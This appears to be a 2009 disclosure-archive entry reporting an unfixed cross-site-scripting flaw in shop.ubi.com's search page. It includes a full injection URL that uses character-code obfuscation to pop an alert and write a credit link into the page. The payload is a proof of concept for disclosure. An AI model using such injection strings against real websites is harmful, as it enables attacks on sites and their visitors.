Security researcher Viper.aT, has submitted on 29/06/2009 a cross-site-scripting (XSS) vulnerability affecting shop.ubi.com, which at the time of submission ranked 2095 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 29/06/2009 |
Date published: 30/06/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Viper.aT |
Domain: shop.ubi.com |
Category: XSS |
Pagerank: 2095 |
|---|
URL: http://shop.ubi.com/Search.asp?keyword=%27%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83,69,68
,32,98,121,32,86,105,112,101,114,46,97,84));%20document.write(String.fromCharCode(60,97,32,104,114,1
01,102,61,34,104,116,116,112,58,47,47,120,115,115,101,100,46,99,111,109,47,97,114,99,104,105,118,101
,47,97,117,116,104,111,114,61,86,105,112,101,114,46,97,84,47,34,62,88,83,83,69,68,60,47,97,62))%3C%2
Fscript%3E&Go.x=0&Go.y=0 |
|
Click here to view the mirror
|
|
|
